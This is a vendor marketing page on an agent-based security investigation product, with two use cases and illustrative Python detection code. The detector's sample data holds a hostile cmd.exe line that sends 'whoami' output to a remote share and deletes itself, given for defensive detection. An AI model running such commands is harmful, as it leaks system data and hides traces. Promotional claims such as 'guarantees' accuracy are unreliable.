Beyond Automation: AI-Driven Autonomous Investigations

Traditional security operations struggle with manual investigations, fragmented workflows, and alert fatigue. Security teams waste valuable time correlating information across tools, chasing false positives, and navigating complex investigative paths.

Pathfinder AI changes this paradigm—delivering fully autonomous threat investigation and response through Agentic AI. Unlike conventional automation, Agentic AI deploys a network of specialized AI agents that:

  • Independently investigate, enrich, and correlate security data.
  • Prioritize threats dynamically, filtering out noise.
  • Generate full attack narratives to reduce manual workload.
  • Automate response actions or provide clear recommendations for analysts.

This approach enables security teams to move beyond reactive security operations and toward proactive, AI-driven security management.

For a deep dive into Pathfinder AI, watch the webinar.

How Pathfinder AI Conducts Autonomous Investigations

Step 1: Alert Trigger and Investigation Orchestration

Graph 3

Every alert detected by the Hunters SOC Platform triggers the deployment of the Investigation Orchestration Agent. This central agent determines the appropriate investigation steps and orchestrates specialized AI agents to analyze different aspects of the potential threat.

  • The Investigation Orchestration Agent evaluates the alert’s context—determining whether it relates to credential misuse, lateral movement, or other attack types.
  • It creates an investigation plan, breaking the threat into multiple specialized investigation tracks.
  • It deploys domain-specific AI agents, each focused on a particular security domain.

Step 2: Specialized AI Agents Perform Targeted Investigations

To ensure a thorough analysis, the Investigation Orchestration Agent assigns domain-specific AI agents, which operate autonomously to collect, analyze, and correlate security signals.

Examples of domain-specific agents:

  • Network Investigation Agent – Runs API calls and SQL queries to analyze traffic anomalies, unauthorized access attempts, and suspicious outbound communications.
  • Cloud Investigation Agent – Retrieves cloud activity logs, permission changes, and security group modifications to detect identity compromise or privilege escalations.
  • Identity Investigation Agent – Examines authentication data, user behavior anomalies, and access patterns to identify unauthorized account activity.
  • Threat Intelligence Agent – Correlates observed activity with known malicious indicators from external threat intelligence feeds.
  • Endpoint Investigation Agent – Analyzes process executions, file modifications, registry changes, and command line activity for potential attacker behaviors.

This is not an exhaustive list—additional agents can be deployed based on the organization’s needs and evolving threat landscape.

Step 3: Threat Classification and Conclusion

Once the domain-specific agents complete their investigations, the Investigation Orchestration Agent evaluates their findings and determines the nature of the detected activity. Possible conclusions include, but are not limited to:

  • Confirmed security threat requiring immediate attention (true positive).
  • Benign event mistakenly flagged as a threat (false positive).
  • Simulated attack conducted by an internal security team (red team activity).
  • Legitimate action performed by an authorized user or system.

If the agent identifies new findings during the investigation that require further examination, it dynamically generates an updated investigation plan and redeploys relevant domain-specific agents to analyze the newly uncovered data. This adaptive and iterative approach ensures greater accuracy, minimizes false positives, and guarantees that security teams focus only on real, high-risk threats.

Step 4: Response Execution or Detection Optimization

If a threat is confirmed, Pathfinder AI takes action:

  • Develops a response plan, generating remediation steps based on the attack’s context.
  • Activates domain-specific AI agents to execute containment and mitigation actions—either autonomously or with analyst approval.

If an alert is deemed benign, Pathfinder AI automatically fine-tunes detections, improving future accuracy and minimizing unnecessary escalations.

This continuous learning capability strengthens security posture over time, ensuring that detection models remain effective against evolving threats.

Video demonstration of how investigation results are delivered to the user and how they take action based on those results.


Pathfinder AI in Action: Real World Use Cases


Use Case 1: Detecting MFA Bypass and Persistent Access in Azure

Attack Scenario:

An attacker gains access to John’s credentials and bypasses MFA using a legacy protocol (IMAP). Once inside, they create a persistent service principal key, ensuring continued unauthorized access to Azure resources, even if John’s password is changed.

Step 1: Investigation Orchestration

  • The Investigation Orchestration Agent detects suspicious authentication via IMAP, triggering an identity compromise investigation.
  • An investigation plan is generated to analyze account activity, cloud modifications, and network behavior.

Step 2: Domain-Specific AI Agents Perform Deep Investigations

  • Identity Investigation Agent:

    • Queries authentication logs for unusual login behavior.
    • Compares current login IP, geolocation, and device fingerprint against historical patterns.
    • Findings: Detects anomalous login from Montenegro, deviating from John’s usual Colorado-based access pattern.

  • Cloud Investigation Agent:

    • Scans Azure logs for newly created service principals.
    • Reviews permission escalations and key assignments.
    • Findings: Flags a new persistent Azure service principal key—anomalous activity immediately following the suspicious login.

  • Network Investigation Agent:

    • Monitors outbound traffic patterns for data exfiltration attempts.
    • Scans for connections to known malicious infrastructure.
    • Findings: Detects a brief spike in outbound traffic, but the destination matches an internal backup service. No data exfiltration is observed.

Step 3: Correlation and Confirmation

  • Pathfinder AI correlates key findings:
    • IMAP login from an unusual location.
    • Creation of persistent service principal key.
    • No immediate signs of data theft.
  • The system classifies the event as a high-confidence account takeover.

Step 4: Automated Response

  • Revokes John’s Azure session.
  • Forces a password reset and enforces modern authentication.
  • Disables the newly created service principal key to eliminate persistence.

This entire workflow is conducted without manual analyst intervention, accelerating response time while eliminating false positives.
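The correlation and conclusion logic described in Step 3 above and in the classification step of the generic workflow, written out as an added example; this is illustrative code, not Pathfinder AI's implementation, and the event schema, field names and sample sign-in/audit records are all constructed for the example.

```python
from datetime import datetime, timedelta

# Constructed sample events with a simplified schema (not real Entra ID / Azure log formats).
SIGNINS = [
    {"ts": "2024-03-01T07:10:00", "user": "john", "client": "Browser", "country": "US"},
    {"ts": "2024-03-01T08:02:00", "user": "john", "client": "IMAP", "country": "ME"},
    {"ts": "2024-03-01T08:05:00", "user": "dana", "client": "IMAP", "country": "US"},
]
AUDIT = [
    {"ts": "2024-03-01T08:20:00", "actor": "john", "op": "Add service principal credentials"},
    {"ts": "2024-03-01T09:00:00", "actor": "dana", "op": "Add service principal credentials"},
]
BASELINE = {"john": {"US"}, "dana": {"US"}}  # historical sign-in countries per user (constructed)
LEGACY_CLIENTS = {"IMAP", "POP", "SMTP"}     # legacy protocols that cannot enforce MFA
PERSISTENCE_OPS = {"Add service principal credentials"}


def correlate(signins, audit, baseline, window=timedelta(hours=1)):
    """Pair each legacy-client sign-in from a non-baseline country with any
    persistence operation by the same user within `window` after it."""
    findings = []
    for s in signins:
        if s["client"] not in LEGACY_CLIENTS or s["country"] in baseline.get(s["user"], set()):
            continue  # MFA-capable client, or a location the user normally signs in from
        t0 = datetime.fromisoformat(s["ts"])
        for a in audit:
            delta = datetime.fromisoformat(a["ts"]) - t0
            if a["actor"] == s["user"] and a["op"] in PERSISTENCE_OPS and timedelta(0) <= delta <= window:
                findings.append({"user": s["user"], "login": s, "persistence": a})
    return findings


def classify(findings, exfil_observed=False):
    """An anomalous legacy login followed by persistence is treated as a high-confidence
    account takeover whether or not data theft was seen; the plan mirrors the
    response steps listed in Use Case 1."""
    if not findings:
        return "no_takeover_evidence", []
    plan = ["revoke active sessions",
            "force password reset and enforce modern authentication",
            "disable the newly created service principal credential"]
    if exfil_observed:
        plan.append("escalate as a data-exfiltration incident")
    return "high_confidence_account_takeover", plan


if __name__ == "__main__":
    print(classify(correlate(SIGNINS, AUDIT, BASELINE)))
```

Dana's IMAP sign-in is skipped because it comes from her baseline country, so only John's login-plus-persistence pair is reported.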


Use Case 2: Investigating Suspicious Command Execution

Attack Scenario:

A security analyst receives an alert regarding cmd.exe execution on a high-privilege system. The command appears obfuscated and may indicate stealthy attacker activity.

Step 1: Automated Investigation

The Investigation Orchestration Agent detects suspicious command execution and initiates endpoint, network, and forensic analysis.

Step 2: AI-Driven Analysis

Endpoint Investigation Agent:

  • Breaks down the executed command, identifying parameters and execution paths.
  • Flags attempts to redirect output to a remote share and self-delete—a common anti-forensic technique.

Threat Intelligence Agent:

  • Matches observed behavior with known attack techniques from threat databases.
  • Confirms strong alignment with adversary tactics used in recent incidents.

Network Investigation Agent:

  • Scans for recent unusual outbound connections.
  • Findings: Detects communication with an unclassified but non-malicious IP, ruling out exfiltration.

Step 3: Analyst Assistance & Guided Response

  • Pathfinder AI summarizes findings, ensuring analysts understand the threat’s full context.
  • Generates an automated response plan that includes immediate containment actions, preventing further compromise.
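The command breakdown performed by the Endpoint Investigation Agent in Step 2 of this use case, as an added detection example (not Pathfinder AI's code): it flags the two anti-forensic indicators the text names, output redirected to a remote share and self-deletion, on constructed sample command lines.

```python
import re

# Constructed sample command lines for the example (not taken from a real incident).
SUSPICIOUS = r'cmd.exe /c "whoami /all > \\192.0.2.10\share\w.txt & del /f /q %~f0"'
BENIGN = r'cmd.exe /c "dir C:\Users > C:\temp\listing.txt"'

UNC_REDIRECT = re.compile(r">\s*\\\\[\w.-]+\\")  # output redirected to a \\host\share path
SELF_DELETE = re.compile(r"\bdel\b[^&|]*%(?:~[a-z]+)?0\b", re.IGNORECASE)  # del ... %0 / %~f0


def analyze_command(cmdline):
    """Return the anti-forensic indicators present in a cmd.exe command line."""
    flags = []
    if UNC_REDIRECT.search(cmdline):
        flags.append("output_to_remote_share")
    if SELF_DELETE.search(cmdline):
        flags.append("self_delete")
    if cmdline.count("^") >= 5:  # heavy caret escaping is a common obfuscation sign
        flags.append("caret_obfuscation")
    return flags


def verdict(cmdline):
    """Both indicators together match the pattern the page describes; one alone
    is only a lead for the analyst, as with the unclassified IP in Step 2."""
    flags = analyze_command(cmdline)
    if {"output_to_remote_share", "self_delete"} <= set(flags):
        return "likely_anti_forensic", flags
    return ("needs_review", flags) if flags else ("benign", flags)
```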

Why Pathfinder AI is a Game-Changer

Pathfinder AI automates and accelerates security investigations, allowing SOC teams to:

  • Reduce investigation time from hours to minutes.
  • Minimize false positives while improving detection accuracy.
  • Automatically adapt to evolving threats.

As AI-driven security operations continue to evolve, Pathfinder AI ensures security teams stay ahead—operating faster, smarter, and more effectively than ever before. To see Pathfinder AI in action, watch the webinar. Learn more about this launch by reading the press release, which was covered by CSOonline.com, securityboulevard.com, Hacker Noon, marketwatch.com, and more.